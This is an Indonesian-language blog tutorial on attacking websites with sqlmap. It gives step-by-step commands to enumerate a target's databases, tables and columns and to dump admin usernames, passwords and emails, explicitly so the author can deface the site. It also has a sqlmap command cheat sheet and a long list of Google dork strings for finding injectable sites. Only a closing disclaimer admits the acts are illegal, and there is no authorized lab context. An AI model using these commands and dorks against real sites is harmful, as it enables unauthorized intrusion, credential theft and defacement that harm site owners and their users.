top of page

Pentest & Hacking dengan Sqlmap


Picture1.png

Greeting,

Semoga kalian semua dlam keadaan sehat, jasmani dan rohani tentunya yee :)

Kali ini saya akan berbagi tentang bagaimana cara melakukan "Pentest & Hacking dengan Sqlmap" (Tools SQL Injection & Takeover).

sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

biar lebih jelas saya akan menjelaskan sedikit tentang apa itu SQL injection dan database.

SQL injection adalah teknik hacking di mana attacker dapat menyisipkan perintah-perintah SQL melalu URL untuk di eksekusi oleh database. bug atau vulnerability ini terjadi karena kelalian seorang programer atau webmaster dalam melakukan pemograman web seperti tidak difilternya variabel dalam web tersebut.

Database adalah kumpulan informasi yang disimpan di dalam komputer atau webserver secara sistematik yang berguna untuk memperoleh informasi dari basis data tersebut.

Kelebihan menggunakan SQL Map:

Bisa melakukan SQL Injection dengen beberapa method seperti :

  • Boolean-Based Blind SQL Injection

  • Time-Based Blind SQL Injection

  • Error-Based SQL Injectio

  • UNION Query SQL Injection

  • Stacked Query SQL Injection

Bisa berjalan baik untuk beberapa jenis database seperti :

  • MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase & SAP MaxDB

Oke langsung praktek saja, kita akan mencoba untuk melakukan “Fingerprinting Database & Kelemahan SQL” pada sebuah website target.

Yang perlu kamu siapkan :

  1. Tools SQLMAP

  2. PC or Server yang sudah terinstall Python

  3. Target yang memiliki vulnerability SQL Injection

Download SQLMAP di bawah ini :

610271be513f4955971ce0317ae4e17d_150x50.gif

Kalau sudah di download kita lanjut ke step berikutnya. pertama buka dulu terminal (linux) atau CMD (windows) kemudian ketikkan seperti yang dibawah berikut ini :

Untuk Linux :

user@linux:~$ cd /Desktop/sqlmap/

ss-ts1410971014.png

Screenshoot dari terminal Backtrack 5 R2

Untuk Windows :

C:\Documents and Settings\user> cd /sqlmap/ (Kemudian tekan "Enter")

untitleda-ts1410971476.jpg

Screenshoot dari CMD di Windows 7

perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.

nah sekarang kita tunggu beberapa saat dan biarkan sqlmap bekerja sampai sqlmap menemukan database dari target kita. setelah bebearap saat sqlmap telah berhasil menemukan nama database dari target kita. asiikk !!!

saya umpamakan sqlmap berhasil mendapatkan 2 nama database yaitu

information_schema

my_db

langkah selanjutnya yang akan kita lakukan adalah mengintip table yang ada di dalam database tersebut, tapi database yang mana ? hmmmm sepertinya saya lebih tertarik sama database yang bernama "my_db".!! loh kenapa? mungkin feeling aja :-p

sekarang kita ketikkan lagi perintah ini :

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db --tables

karena saya capek mengetikkan contoh untuk linux dan windows, jadi saya akan mengetikkan 1 contoh saja, bagi pengguna linux harus diawali dengan tanda "/" sebelum comand sedangkan di windows tidak di pakai alias langsung aja "sqlmap.py -u bla...bla...bla.."

ok next step, setelah kita tunggu beberapa saat ternyata sqlmap menemukan table yang ada di dalam database "my_db". Saya umpamakan table-table tersebut adalah sebagai berikut :

admin

members

item

nah karena saya ingin melakukan deface, maka saya akan membuka isi dari table admin tersebut. langsung aja kita ketikkan di terminal atau CMD perintah ini :

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin --columns

lalu enter dan tunggu beberapa saat, dan kita mendapati "column" dari "table" admin tadi. saya umpamakan nama column nya :

ID

username

password

email_address

country

disini saya akan mengambil informasi dari dalam "column" admin tadi, yang ingin saya intip adalah "username","password",dan "email_address". Maka saya akan kembali mengetikkan perintah :

./sqlmap.py -u https://www.target.com/index.php?id=7 -D my_db -T admin -C username,password,email_address --dump

dan hasilnya saya mendapati sebagai berikut :

admin:123456:admin@target.com

ini artinya :

admin = username

123456 = password

admin@target.com = email_address

Untuk selanjutnya saya mengasumsikan anda sudah tau lah ya mesti berbuat apa untuk data tersebut ,sensor :p

Berikut adalah beberapa command penting di SQLMAP

Untuk melakukan scanning terhadap Target [URL]

./sqlmap.py -u[url]

Untuk mendapatkan informasi database Target [URL]

./sqlmap.py -u[url] –dbs

Untuk mendapatkan informasi table di database Target [URL]

./sqlmap.py -u [url] –tables -D [database]

Untuk mendapatkan informasi kolom didalam table yang ada didatabase Target [URL]

./sqlmap.py -u [url] –columns -T [table name] -D [databasename]

Untuk melakukan dump kolom, table dan database Target [URL]

./sqlmap.py -u [url] –dump –columns -T [table name] -D [databasename]

Untuk melakukan dump spesifik kolom Target [URL]

./sqlmap.py -u [url] –dump -C [column name] -T [table name] -D [database name]

Berikut Google Dork Strings untuk mempermudah dan menemukan website vurnerability atau yang rentan terhadap SQL injection :

inurl:item_id=

inurl:newsid=

inurl:trainers.php?id=

inurl:news-full.php?id=

inurl:news_display.php?getid=

inurl:index2.php?option=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:newsone.php?id=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:index.php?catid=

inurl:news.php?catid=

inurl:index.php?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:Stray-Questions-View.php?num=

inurl:forum_bds.php?num=

inurl:game.php?id=

inurl:view_product.php?id=

inurl:newsone.php?id=

inurl:sw_comment.php?id=

inurl:news.php?id=

inurl:avd_start.php?avd=

inurl:event.php?id=

inurl:product-item.php?id=

inurl:sql.php?id=

inurl:material.php?id=

inurl:clanek.php4?id=

inurl:announce.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:viewapp.php?id=

inurl:viewphoto.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:review.php?id=

inurl:iniziativa.php?in=

inurl:curriculum.php?id=

inurl:labels.php?id=

inurl:story.php?id=

inurl:look.php?ID=

inurl:newsone.php?id=

inurl:aboutbook.php?id=

inurl:material.php?id=

inurl:opinions.php?id=

inurl:announce.php?id=

inurl:rub.php?idr=

inurl:galeri_info.php?l=

inurl:tekst.php?idt=

inurl:newscat.php?id=

inurl:newsticker_info.php?idn=

inurl:rubrika.php?idr=

inurl:rubp.php?idr=

inurl:offer.php?idf=

inurl:art.php?idm=

inurl:title.php?id=

inurl:news_view.php?id=

inurl:select_biblio.php?id=

inurl:humor.php?id=

inurl:aboutbook.php?id=

inurl:ogl_inet.php?ogl_id=

inurl:fiche_spectacle.php?id=

inurl:communique_detail.php?id=

inurl:sem.php3?id=

inurl:kategorie.php4?id=

inurl:news.php?id=

inurl:index.php?id=

inurl:faq2.php?id=

inurl:show_an.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:opinions.php?id=

inurl:spr.php?id=

inurl:pages.php?id=

inurl:announce.php?id=

inurl:clanek.php4?id=

inurl:participant.php?id=

inurl:download.php?id=

inurl:main.php?id=

inurl:review.php?id=

inurl:chappies.php?id=

inurl:read.php?id=

inurl:prod_detail.php?id=

inurl:viewphoto.php?id=

inurl:article.php?id=

inurl:person.php?id=

inurl:productinfo.php?id=

inurl:showimg.php?id=

inurl:view.php?id=

inurl:website.php?id=

inurl:hosting_info.php?id=

inurl:gallery.php?id=

inurl:rub.php?idr=

inurl:view_faq.php?id=

inurl:artikelinfo.php?id=

inurl:detail.php?ID=

inurl:index.php?=

inurl:profile_view.php?id=

inurl:category.php?id=

inurl:publications.php?id=

inurl:fellows.php?id=

inurl:downloads_info.php?id=

inurl:prod_info.php?id=

inurl:shop.php?do=part&id=

inurl:productinfo.php?id=

inurl:collectionitem.php?id=

inurl:band_info.php?id=

inurl:product.php?id=

inurl:releases.php?id=

inurl:ray.php?id=

inurl:produit.php?id=

inurl:pop.php?id=

inurl:shopping.php?id=

inurl:productdetail.php?id=

inurl:post.php?id=

inurl:viewshowdetail.php?id=

inurl:clubpage.php?id=

inurl:memberInfo.php?id=

inurl:section.php?id=

inurl:theme.php?id=

inurl:page.php?id=

inurl:shredder-categories.php?id=

inurl:tradeCategory.php?id=

inurl:product_ranges_view.php?ID=

inurl:shop_category.php?id=

inurl:transcript.php?id=

inurl:channel_id=

inurl:aboutbook.php?id=

inurl:preview.php?id=

inurl:loadpsb.php?id=

inurl:pages.php?id=

* Harap menjadi perhatian tindakan ini merupakan ilegal, tindakan ini semata-mata hanya sebagai pembelajaran saja. tutorial ini dibuat hanya untuk tujuan pembelajaran, Kesalahan penggunaan tools ditanggung jawab sepenuhnya oleh pengguna, Saya tidak bertanggung jawab atas tindakan yang akan anda lakukan.

Featured Posts
Recent Posts
Archive
Search By Tags
No tags yet.
Follow Us
  • Facebook Basic Square
  • Twitter Basic Square
  • Google+ Basic Square
bottom of page